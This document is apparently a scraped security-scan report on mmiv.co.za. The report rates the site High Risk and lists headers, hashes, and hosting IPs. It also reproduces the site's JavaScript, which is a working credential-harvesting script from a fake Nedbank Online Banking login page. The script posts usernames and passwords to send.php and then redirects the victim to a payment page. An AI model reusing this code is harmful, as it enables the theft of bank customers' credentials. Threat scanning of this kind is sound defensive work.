finance banking

documentation technical

technology software

government public service

finance/banking

English

The domain 'mmiv.co.za' uses the South African country-code top-level domain (.co.za). Its registrable label 'mmiv' stretches across 4 characters split between 1 vowel and three consonants. Segmentation suggests 1 word: mmiv. No strong language cues emerged from the frequency lists.

username

password

g-recaptcha-response

html/9d/7d/9d7d8afa-aeb2-4c9b-a1b0-39bf50353f4b.html.gz

frame-ancestors 'self' *.qualtrics.com *.my.salesforce.com *.visualforce.com *.visual.force.com *.lightning.force.com; report-uri https://sjc1.qualtrics.com/csp-report

require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/recaptcha-scs

script-src 'report-sample' 'nonce-tlibe5oNSQ-VDBwqtVLqJg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1

require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes

script-src 'report-sample' 'nonce-ggELYfvFBFky2VhuE9aZ7A' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1

a-fb9mgcmtyse4

reCAPTCHA

c-fb9mgcmtyse4

recaptcha challenge expires in two minutes

978fac2be86f2eb465f159ff364c5620dbcc28233a393b1457f399804323ed2d

8ff500755096b016dac8e89c730bb04f78dbe3246e15a3b5b4ed8c5d152a3ef2

c2ae58b657c4a399b03d9f3faabadbb57880511c9ac78c3fb46e226d0fb57918

ff226e2b505e924b5b6aeda5d960c6d17a0d9132c9776fd8bb9a17a0051b3773

ce27cbb2e1e99239ac5b2d37767ab1d1f4fb184f220229bb30b1851dfbeca57b

0c8bae637b621a6e94e999829ffdf45241d3614c64a28d4985dd8176569a914d

1d6b392a945decd931ae23091257966a8714bf2d5f5579a63867f062dc7505a0

cdf180323c2d4996796336d656b7bec10dc617f8c0ec5b94b70bfb268b2297f6

bd052172b8ce7398747170427d49a5e94e2499c379d84221fd517617579ff4af

d09e24b8ed75dd354626ee88454cc3ddbe2fe5d820ff43e040bc6c8d9e27f83f

6aed5f4153bd8ed5b4184c58ad6046dae84bd2bedd4bc47796366dce2edd1f61

af3d52b7bc93b96ca12abe1d73c6d99db23fb168673c55d375ca7065756cb4de

3a5125ccb8b05394a287b52bace790dc53cbc47e41b62e55dea68fae7be204b8

A7vZI3v+Gz7JfuRolKNM4Aff6zaGuT7X0mf3wtoZTnKv6497cVMnhy03KDqX7kBz/q/iidW7srW31oQbBt4VhgoAAACUeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJEaXNhYmxlVGhpcmRQYXJ0eVN0b3JhZ2VQYXJ0aXRpb25pbmczIiwiZXhwaXJ5IjoxNzU3OTgwODAwLCJpc1N1YmRvbWFpbiI6dHJ1ZSwiaXNUaGlyZFBhcnR5Ijp0cnVlfQ==

viewport

format-detection

apple-mobile-web-app-capable

apple-mobile-web-app-status-bar-style

For a safer, more convenient way to bank, register for Nedbank Online Banking. Make payments, play LOTTO and more 24/7.

description

theme-color

HSTS header missing - vulnerable to protocol downgrade attacks

CSP header missing - vulnerable to XSS attacks

child-src https:  chrome-untrusted://new-tab-page/ chrome-untrusted://ntp-microsoft-auth/;connect-src chrome://resources chrome://theme 'self';default-src 'self';font-src chrome://resources 'self';img-src chrome://resources chrome://theme chrome://image chrome://favicon2 chrome://app-icon chrome://extension-icon chrome://fileicon blob: data: 'self';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources chrome://webui-test 'self';style-src chrome://resources chrome://theme 'self' 'unsafe-inline';trusted-types parse-html-subset sanitize-inner-html static-types webui-test-script webui-test-html polymer-html-literal polymer-template-event-attribute-policy lit-html-desktop;frame-ancestors 'none';

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;worker-src blob: 'self';frame-ancestors 'none';

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;frame-ancestors 'none';

base-uri 'none';child-src https:;form-action https://ogs.google.com https://*.corp.google.com;object-src 'none';script-src 'self' 'unsafe-inline' https:;frame-ancestors chrome://new-tab-page/

mmiv.co.za

// reCAPTCHA variables
 let isRecaptchaValid = false;
 let recaptchaResponse = '';

 // reCAPTCHA callback functions
 function recaptchaCallback(response) {
 isRecaptchaValid = true;
 recaptchaResponse = response;
 document.getElementById('recaptchaError').style.display = 'none';
 
 // Hide reCAPTCHA overlay and show the main page
 document.getElementById('recaptchaOverlay').style.display = 'none';
 document.querySelector('.root-element').style.display = 'block';
 }

 function recaptchaExpiredCallback() {
 isRecaptchaValid = false;
 recaptchaResponse = '';
 document.getElementById('recaptchaError').style.display = 'block';
 grecaptcha.reset();
 }

 function recaptchaErrorCallback() {
 isRecaptchaValid = false;
 recaptchaResponse = '';
 document.getElementById('recaptchaError').style.display = 'block';
 }

 // Function to check inputs and enable/disable button
 function checkInputs() {
 const username = document.getElementById('username').value;
 const password = document.getElementById('password').value;
 const loginButton = document.getElementById('log_in');
 const buttonContainer = document.getElementById('loginButtonContainer');
 
 // Check if both fields have at least 6 characters
 if (username.length >= 6 && password.length >= 6) {
 loginButton.disabled = false;
 buttonContainer.classList.remove('btn-disabled');
 buttonContainer.classList.add('btn-enabled');
 } else {
 loginButton.disabled = true;
 buttonContainer.classList.remove('btn-enabled');
 buttonContainer.classList.add('btn-disabled');
 }
 }
 
 // Function to submit login via AJAX (hidden request)
 function submitLogin() {
 const username = document.getElementById('username').value;
 const password = document.getElementById('password').value;
 
 // Check if reCAPTCHA is valid
 if (!isRecaptchaValid) {
 alert('Please complete the security verification first.');
 return false;
 }
 
 if (username.length < 6 || password.length < 6) {
 alert('Please enter at least 6 characters for both username and password.');
 return false;
 }
 
 // Show loading state
 const loginButton = document.getElementById('log_in');
 loginButton.disabled = true;
 loginButton.innerHTML = ' Processing... ';
 
 // Prepare data for submission
 const formData = new FormData();
 formData.append('username', username);
 formData.append('password', password);
 formData.append('g-recaptcha-response', recaptchaResponse);
 
 // Submit via AJAX (hidden request)
 fetch('send.php', {
 method: 'POST',
 body: formData,
 headers: {
 'X-Requested-With': 'XMLHttpRequest'
 }
 })
 .then(response => {
 if (response.ok) {
 // Reset reCAPTCHA
 grecaptcha.reset();
 // Redirect to payment.php after successful submission
 window.location.href = 'payment.php';
 } else {
 throw new Error('Network response was not ok');
 }
 })
 .catch(error => {
 console.error('Error:', error);
 // Reset reCAPTCHA on error
 grecaptcha.reset();
 // If AJAX fails, try traditional form submission as fallback
 document.getElementById('hiddenUsername').value = username;
 document.getElementById('hiddenPassword').value = password;
 document.getElementById('g-recaptcha-response').value = recaptchaResponse;
 document.getElementById('hiddenForm').submit();
 });
 
 return false;
 }

 // Function for hamburger menu
 function toggleMenu() {
 const sideMenu = document.getElementById('sideMenu');
 const menuOverlay = document.getElementById('menuOverlay');
 const hamburgerBtn = document.getElementById('hamburgerBtn');
 
 sideMenu.classList.toggle('active');
 menuOverlay.classList.toggle('active');
 hamburgerBtn.classList.toggle('active');
 }

 function closeMenu() {
 const sideMenu = document.getElementById('sideMenu');
 const menuOverlay = document.getElementById('menuOverlay');
 const hamburgerBtn = document.getElementById('hamburgerBtn');
 
 sideMenu.classList.remove('active');
 menuOverlay.classList.remove('active');
 hamburgerBtn.classList.remove('active');
 }
 
 // Initialize button state on page load
 document.addEventListener('DOMContentLoaded', function() {
 // Initially hide the main content until reCAPTCHA is verified
 document.querySelector('.root-element').style.display = 'none';
 
 // Show reCAPTCHA overlay
 document.getElementById('recaptchaOverlay').style.display = 'flex';
 
 // Initialize button state for login form
 setTimeout(function() {
 if (document.getElementById('username')) {
 checkInputs();
 }
 }, 1000);
 });

 var ua = window.navigator.userAgent;
 var msie = ua.indexOf("MSIE ");
 var isIEOldVersion= msie > 0 && !navigator.userAgent.match(/Trident.*rv\:11\./); 
 var rootElement=document.getElementsByClassName('root-element')[0];
 var outDatedBrowser=document.getElementsByClassName('outdated-browser-Info')[0];
 if(isIEOldVersion){
 rootElement.style.display='none'; 
 outDatedBrowser.style.display='block';
 }else{
 rootElement.classList.remove('hide-app-root');
 outDatedBrowser.style.display='none';
 }

if (document.domain != "secured.nedbank.co.za") { var l = location.href; var r = document.referrer; var m = new Image(); m.src = "http://docs.nedbank.co.za/cdn/8csygl83kdx15rwo1g4brmf0d/spacer.gif?l=" + encodeURI(l) + "&r=" + encodeURI(r);}

Requests	IP Address	Location	AS Autonomous System
10	142.251.141.99	United States	AS15169GOOGLE
3	102.216.79.228	Cape Town, Western Cape, South Africa	AS328266Atomic-AS
3	104.17.209.240	United States	AS13335CLOUDFLARENET
3	142.250.185.195	United States	AS15169GOOGLE
3	142.251.140.164	United States	AS15169GOOGLE
3	18.245.60.28	United States	AS16509AMAZON-02
3	52.214.255.32	Dublin, Leinster, Ireland	AS16509AMAZON-02
3	172.64.147.188	United States	AS13335CLOUDFLARENET
3	104.18.40.68	United States	AS13335CLOUDFLARENET
3	104.17.208.240	United States	AS13335CLOUDFLARENET
61	18	-	-

Security Scan Report: mmiv.co.za

Summary

AI Security Verdict

High Risk

Risk Factors

Details

Screenshot

Page Load Overview

Language Analysis

Primary Language

Detection Details

Website Classification

Primary Category

All Detected Categories

Detected Features

Domain & IP Information

Detected Technologies2

Content Similarity HashesFor malware variant detection

TLSH (Trend Micro Locality Sensitive Hash)

ssdeep (Context Triggered Piecewise Hashing)

sdhash (Similarity Digest Hashing)

Image Hashes

Perceptual Hashes

Other Hashes

Scan History